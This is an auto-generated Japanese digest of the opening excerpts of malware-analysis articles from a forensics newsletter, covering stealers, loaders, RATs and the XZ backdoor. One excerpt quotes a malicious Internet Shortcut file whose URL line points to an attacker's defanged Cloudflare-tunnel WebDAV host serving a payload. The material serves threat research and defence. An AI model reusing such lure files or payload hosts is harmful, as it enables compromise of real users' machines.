本エントリは This Week in 4n6 (FourAndSix=Forensics) で紹介された各記事の冒頭を表示し、チェックする記事をザッピングするために自動生成&投稿したものです。4n6 は こちら からご確認いただけます。
MALWARE
ASEC
Since web servers are externally exposed to provide web services to all available users, they have been major targets for threat actors since the past. AhnLab SEcurity Intelligence Center (ASEC) is monitoring attacks against vulnerable web servers that have unpatched vulnerabilities or are being poorly managed, and is sharing the attack cases that have been confirmed through its ASEC Blog. ASEC recently identified attack cases where a Korean medical institution was targeted, resulting in the ins...
AhnLab SEcurity intelligence Center (ASEC) has recently discovered malware being distributed through CMD files and identified it as a downloader called DBatLoader (ModiLoader) that had been distributed before via phishing emails in RAR file format containing an EXE file. The file contained “FF, FE” which means “UTF-16LE”, so when the internal code was opened with a text editor, the content of the code was not displayed correctly. Figure 1. Code not displayed correctly However, if “FF, FE” is del...
AhnLab SEcurity intelligence Center (ASEC) has discovered the distribution of a new type of malware that is disguised as cracks and commercial tools. Unlike past malware which performed malicious behaviors immediately upon being executed, this malware displays an installer UI and malicious behaviors are executed upon clicking buttons during the installation process. It is deemed that when the user makes a download request, a malware is instantly created to give a reply instead of distributing pr...
Baris Dincer
Blackberry
Threat Analysis Insight: RisePro Information Stealer RESEARCH & INTELLIGENCE / 06.26.24 / The BlackBerry Research and Intelligence Team Share on X Share on Facebook Share on LinkedIn Email Summary RisePro is a multifunctional information-stealer often sold on underground forums as part of a Malware-as-a-Service (MaaS) offering. Although this malware family was initially observed in late 2022, a sharp increase of activity surrounding this malware was detected by BlackBerry during the latter end o...
Cybereason
Written By Cybereason Security Services Team Cybereason Security Services issues Threat Analysis reports to inform on impacting threats. The Threat Analysis reports investigate these threats and provide practical recommendations for protecting against them. In this Threat Analysis report, Cybereason Security Services investigate the rising activity of the malware GootLoader. KEY POINTS Don't stop me now: GootLoader remains in active use and development by threat actors, with no loss of popularit...
Dr Josh Stroschein – The Cyber Yeti
YouTube video
Emanuele De Lucia
Posted On 25 June 202425 June 2024 By edelucia HomeGenericUnveiling Obfuscated Batch Scripts: From UTF-8 to UTF-16 BOM Conversion This morning I observed an Internet Shortcut file (sha256:0817cd8b0118e2f023342ad016ef443fd4c2e4657a373f9023807a231d16b0fa – Fattura Elettronica 11817929720.url) designed to compromise an Italian organization, containing these instructions: [InternetShortcut] URL=file://hook-border-surf-spencer[.]trycloudflare[.]com@SSL/DavWWWRoot/SC700T[.]lnk IDList= HotKey=0 [{00021...
Hassan Faizan at Forcepoint
Cara Lin at Fortinet
By Cara Lin | June 27, 2024 Article Contents By Cara Lin | June 27, 2024 Affected Platforms: Microsoft Windows Impacted Users: Microsoft Windows Impact: The stolen information can be used for future attack Severity Level: High Spyware is malicious software engineered to covertly monitor and gather information from a user’s computer without their awareness or consent. It can record activities like keystrokes, browsing behavior, and personal information, often transmitting this data to a third par...
HackTheBox
We explore the key capabilities of this Cuttlefish Malware through the lens of the MITRE ATT&CK framework. Howard Poston, Jun 27 2024 Table of Contents How Cuttlefish works Initial infection Cuttlefish startup Hijacking traffic to private IPs Collecting credentials from public traffic VPN and proxy capabilities Cuttlefish in MITRE and HTB HTB and MITRE ATT&CK mapped skills development The Cuttlefish Malware is a recent zero-click malware variant identified and analyzed by Lumen Technologies’ Bla...
Baran S at K7 Labs
Posted byBaran S June 25, 2024June 25, 2024 AndroidStealer Trojan SpyMax – An Android RAT targets Telegram Users By Baran SJune 25, 2024 Threat actors are constantly working on novel ways to target users across the globe. This blog is about SpyMax, an Android RAT that targets Telegram users. A point to be noted is that this RAT does not require the targeted device to be rooted; making it easier for the threat actors to do the intended damage. SpyMax is a Remote Administration Tool (RAT) that has...
Jérôme Segura at Malwarebytes
Posted: June 27, 2024 by Jérôme Segura On June 24, we observed a new campaign distributing a stealer targeting Mac users via malicious Google ads for the Arc browser. This is the second time in the past couple of months where we see Arc being used as a lure, certainly a sign of its popularity. It was previously used to drop a Windows RAT, also via Google ads. The macOS stealer being dropped in this latest campaign is actively being developed as an Atomic Stealer competitor, with a large part of ...
Durgesh Sangvikar, Yanhui Jia, Chris Navarrete and Matthew Tennis at Palo Alto Networks
7 min read Related ProductsAdvanced Threat PreventionAdvanced URL FilteringAdvanced WildFireCloud-Delivered Security ServicesCortexCortex XDRCortex XSOARNext-Generation FirewallPrisma CloudUnit 42 Incident Response By:Durgesh SangvikarYanhui JiaChris NavarreteMatthew Tennis Published:26 June, 2024 at 3:00 AM PDT Categories:MalwareThreat Research Tags:Cobalt StrikeMalleable C2 profile Share Executive Summary In this article, Unit 42 researchers detail recent findings of malicious Cobalt Strike in...
Rapid7
Jun 27, 2024 10 min read Rapid7 Last updated at Fri, 28 Jun 2024 18:00:03 GMT The following Rapid7 analysts contributed to this research: Leo Gutierrez, Tyler McGraw, Sarah Lee, and Thomas Elkins.Executive Summary On Tuesday, June 18th, 2024, Rapid7 initiated an investigation into suspicious activity in a customer environment. Our investigation identified that the suspicious behavior was emanating from the installation of Notezilla, a program that allows for the creation of sticky notes on a Win...
RevEng.AI Blog
Executive Summary RevEng.AI observed a Latrodectus sample (a.k.a. Unidentified 111, Lotus, BLACKWIDOW, IceNova) delivery chain using a malicious JavaScript (JS) stager uploaded to a third-party public malware scanning service on 23 June 2024. Since early January until the present, RevEng.AI has observed versions 1.1 to 1.3 in operational use by the adversary (although earlier versions do exist, as documented by industry reporting [1]). Latrodectus is a loader typically delivered by phishing emai...
Lucija Valentić at ReversingLabs
The history of the package is a lesson in why tracking open source threats is such a challenge — and highlights the value of RL's new Spectra Assure Community. Blog Author Lucija Valentić, Software Threat Researcher, ReversingLabs. Read More... ReversingLabs researchers have made it a priority to monitor public, open source repositories for malicious packages that may lurk on them in recent years. The number and frequency of malicious packages has increased steadily as malicious actors turn to s...
RussianPanda
RussianPanda Case Study The GlorySprout ads surfaced on the XSS forum at the beginning of March 2024 (the name makes me think of beansprout; perhaps the seller behind the stealer is a vegetarian). The stealer, developed in C++, is available for purchase at $300, offering lifetime access and 20 days of crypting service, which encrypts the stealer’s payload to evade detection. Similar to other stealers, it includes a pre-built loader, Anti-CIS execution, and a Grabber module (which is non-function...
Anderson Leite and Sergey Belov at Securelist
Incidents 24 Jun 2024 minute read Table of Contents Key findingsDetailed analysisED448-encrypted public key extraction – x86-based steganographyPayload decryption and signature checkPayload signature checkBackdoor commandsBypass SSH authenticationRemote command execution via ‘system’ callThe mm_answer_keyallowed hookLog hiding capabilitiesConclusion Authors Anderson Leite Sergey Belov Part 1: XZ backdoor story – Initial analysis Part 2: Assessing the Y, and How, of the XZ Utils incident (social ...
Security Onion
Thanks to Brad Duncan for sharing this pcap from 2024-05-14 on his malware traffic analysis site! Due to issues with Google flagging a warning for the site, we're not including the actual hyperlink but it should be easy to find.We did a quick analysis of this pcap on the NEW Security Onion 2.4.80://blog.securityonion.net/2024/06/security-onion-2480-now-available.htmlIf you'd like to follow along, you can do the following:install Security Onion 2.4.80 in a VM://docs.securityonion.net/en/2.4/first...
SonicWall
By Security NewsJune 24, 2024The SonicWall Capture Labs threat research team has been tracking StrelaStealer for a long time. Recently, in the third week of June, we observed a huge spike in JavaScript spreading StrelaStealer. StrelaStealer specifically steals Outlook and Thunderbird email credentials. The infection chain looks like previous versions of StrelaStealer except major checks have been added to avoid infecting systems in Russia. We are continuing to observe its target regions limited ...
By Security NewsJune 27, 2024Overview This week, the SonicWall Capture Labs threat research team investigated a sample of Orcinius malware. This is a multi-stage trojan that is using Dropbox and Google Docs to download second-stage payloads and stay updated. It contains an obfuscated VBA macro that hooks into Windows to monitor running windows and keystrokes and creates persistence using registry keys. Infection Cycle The initial infection method is an Excel spreadsheet, in this case, “CALENDARI...
By Security NewsJune 27, 2024DarkMe RAT steals information from victims’ machines and responds to various commands received from its Command and Control (C&C) server. A spike in distributing DarkMe RAT was observed in February 2024, exploiting the zero-day (CVE-2024-21412) by the hacking group Water Hydra. The SonicWall threat research team recently analyzed a variant of the DarkMe RAT malware. Execution of DarkMe RAT starts from a Windows Shortcut File (LNK) which uses a Microsoft Installer Fil...
System Weakness
Ahmed Mohamed Ibrahim , Shubham Singh, and Sunil Bharti at Trend Micro
Examining Water Sigbin's Infection Routine Leading to an XMRig Cryptominer We analyze the multi-stage loading technique used by Water Sigbin to deliver the PureCrypter loader and XMRIG crypto miner. By: Ahmed Mohamed Ibrahim , Shubham Singh, Sunil Bharti June 28, 2024 Read time: ( words) Save to Folio Subscribe Summary Water Sigbin continues to exploit CVE-2017-3506 and CVE-2023-21839 to deploy cryptocurrency miners via a PowerShell script. The threat actor employs fileless execution techniques,...
Zhassulan Zhussupov
6 minute read ﷽ Hello, cybersecurity enthusiasts and white hackers! Like in the previous malware development trick example, this post is just for showing Proof of Concept. In the practice example with Telegram API, the attacker has one weak point: if the victim’s computer does not have a Telegram client or let’s say that messengers are generally prohibited in the victim’s organization, then you must agree that interaction with Telegram servers may raise suspicion (whether through a bot or not). ...
بانک اطلاعات تهدیدات بدافزاری پادویش
Backdoor.Win32.Tofsee 2024-06-302024-06-30 شرح کلی نوع: تروجان (درب پشتی) درجه تخریب: زیاد میزان شیوع: متوسط اسامی بدافزار (Padvish) Backdoor.Win32.Tofsee A Variant Of Win32/Tofsee.AJ (ESET) Backdoor:Win32/Hostil.gen!A (Microsoft) HEUR:Trojan.Win32.Generic (Kaspersky) بدافزار درب پشتی (Backdoor) چیست؟ بدافزارهای درب پشتی برنامههایی هستند که امکان دور زدن مکانیزمهای امنیتی یک سیستم را به هکرها داده و منابع مختلفی از آن سیستم را از راه مربوطه در اختیار نفوذگران قرار میدهند. هکرها میتوانند با ا...
